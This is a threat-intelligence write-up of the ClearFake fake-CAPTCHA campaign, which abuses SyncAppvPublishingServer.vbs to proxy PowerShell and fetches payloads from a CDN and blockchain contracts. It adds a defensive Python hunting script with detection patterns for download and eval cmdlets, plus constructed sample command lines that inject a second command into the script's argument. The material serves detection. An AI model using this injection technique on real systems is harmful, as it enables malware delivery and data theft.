ClearFake Campaign – Proxy Execution via Trusted Windows Feature

The ClearFake malware operation has evolved into a highly evasive delivery chain, combining fake CAPTCHA lures with proxy execution techniques that abuse legitimate Windows components to run malicious PowerShell commands.

Attack Flow

  1. Compromised websites display a fake CAPTCHA challenge.
  2. Victims are tricked into pressing Win + R and pasting into the Run dialog the clipboard content the page placed there.
  3. The command leverages SyncAppvPublishingServer.vbs (a legitimate Windows App-V script in System32).
  4. This script acts as a proxy executor, passing malicious arguments into PowerShell.
  5. Payloads are fetched from jsDelivr CDN and BNB Smart Chain smart contracts, making them appear legitimate and resilient against blocklists.
  6. Malware establishes persistence, enabling data theft, remote access, or further payload deployment.

Why It’s Dangerous

  • Living-off-the-land tactics: No obvious malware files dropped; execution relies on trusted Windows features.
  • Blockchain infrastructure: Operators use Ethereum-style smart contracts on the BNB Smart Chain testnet as resilient command centers.
  • CDN hosting: Later-stage payloads delivered via jsDelivr, a widely trusted content delivery network.
  • Stealth: Leaves little trace on disk, blends into normal network traffic.
  • Scale: Analysts estimate ~150,000 infections based on unique IDs stored in the smart contract.

Technical Highlights

  • Proxy execution: Abuse of SyncAppvPublishingServer.vbs to run malicious PowerShell commands.
  • Obfuscated JavaScript loaders: Embedded in hacked sites, fetched dynamically from Web3 endpoints.
  • Persistence: Payload loop maintains execution and can accept new instructions from C2.
  • Geographic spread: Infections observed globally, with distribution mapped across multiple regions.

Defensive Recommendations

  • User awareness: Train users to avoid copy-paste instructions from CAPTCHAs or pop-ups.
  • Endpoint monitoring: Detect unusual use of SyncAppvPublishingServer.vbs and PowerShell proxy execution.
  • Network defense: Inspect traffic to jsDelivr and Web3 endpoints for anomalies.
  • Threat hunting: Look for clipboard manipulation and suspicious Run dialog activity.
  • Block abuse: Restrict execution of App-V scripts if not required in enterprise environments.
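The endpoint-monitoring and threat-hunting items above can be turned into a small hunt over process-creation telemetry. The following is an added example written for this page; it is not code from the article or from the ClearFake analysis it summarizes. It assumes Sysmon-style process-creation records with Image, ParentImage and CommandLine fields, and the argument heuristics (command separators, download cmdlets, dynamic evaluation, URLs, encoded blobs) and the explorer.exe-as-interactive-parent rule are assumptions of this example, not a vendor detection rule. The sample events are constructed, with placeholder arguments rather than real payload strings.

```python
"""
Hunt for proxy execution through SyncAppvPublishingServer.vbs in
process-creation telemetry (Sysmon Event ID 1 style records).

Added example for this page; field names and heuristics are assumptions.
"""
import re

# The script passes its single argument into a PowerShell command line.
# Legitimate App-V use supplies a short, plain argument; anything that
# chains further commands, evaluates text, or reaches the network is
# worth a look. (Assumed heuristic set, not a vendor rule.)
SUSPICIOUS_ARG_PATTERNS = {
    "command_separator": re.compile(r"[;|&]"),
    "download_cmdlet": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|iwr\b|invoke-restmethod|irm\b",
        re.I),
    "dynamic_eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "url": re.compile(r"https?://", re.I),
    "encoded_blob": re.compile(r"frombase64string|-encodedcommand|-enc\b", re.I),
}

# Parents from which a user-driven Win+R launch originates (assumption).
INTERACTIVE_PARENTS = {"explorer.exe"}

# Matches the script path and captures whatever follows it as the argument.
VBS_ARG_RE = re.compile(r'syncappvpublishingserver\.vbs"?(?:\s+(.*))?$', re.I)


def extract_vbs_argument(command_line):
    """Return the argument handed to the .vbs, '' if none, None if the
    command line does not reference the script at all."""
    m = VBS_ARG_RE.search(command_line)
    if not m:
        return None
    arg = (m.group(1) or "").strip()
    # Strip one layer of surrounding quotes.
    if len(arg) >= 2 and arg[0] == arg[-1] == '"':
        arg = arg[1:-1]
    return arg


def score_event(event):
    """Return a finding dict for a suspicious launch, or None."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if image not in {"wscript.exe", "cscript.exe"}:
        return None
    arg = extract_vbs_argument(event.get("CommandLine", ""))
    if arg is None:
        return None  # some other script host activity
    reasons = [name for name, pat in SUSPICIOUS_ARG_PATTERNS.items() if pat.search(arg)]
    if parent in INTERACTIVE_PARENTS:
        reasons.append("launched_from_interactive_parent")
    if not reasons:
        return None  # plain argument from a non-interactive parent: likely App-V housekeeping
    return {
        "argument": arg,
        "reasons": reasons,
        "severity": "high" if len(reasons) >= 2 else "medium",
    }


def hunt(events):
    """Run score_event over a list of records; returns findings with their index."""
    findings = []
    for idx, ev in enumerate(events):
        f = score_event(ev)
        if f:
            findings.append({"index": idx, **f})
    return findings


# Constructed sample records (not real telemetry). Payload arguments are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",        # Win+R lure pattern
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n; iex([CONSTRUCTED-STAGE-ONE])"'},
    {"Image": r"C:\Windows\System32\wscript.exe",        # plausible legitimate App-V use
     "ParentImage": r"C:\Program Files\Microsoft Application Virtualization\Client\AppVClient.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n"'},
    {"Image": r"C:\Windows\System32\cscript.exe",        # CDN fetch chained into the argument
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; iwr https://cdn.jsdelivr.net/CONSTRUCTED-PATH"'},
    {"Image": r"C:\Windows\System32\notepad.exe",        # unrelated process
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\Public\notes.txt"},
    {"Image": r"C:\Windows\System32\wscript.exe",        # different script, not this proxy
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe C:\Users\Public\login.vbs'},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The severity split is deliberately simple: a single weak indicator (for example an interactive parent with a plain argument) is surfaced for review, while an injected argument that both chains commands and reaches the network is scored high. In a real deployment the same logic would read events exported from Sysmon or an EDR rather than the embedded list.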

Takeaway

ClearFake demonstrates how attackers are weaponizing trusted Windows features and blockchain/CDN infrastructure to evade detection. By blending social engineering with living-off-the-land techniques, this campaign poses a serious challenge for defenders, requiring behavioral monitoring and proactive awareness rather than reliance on traditional signature-based defenses.
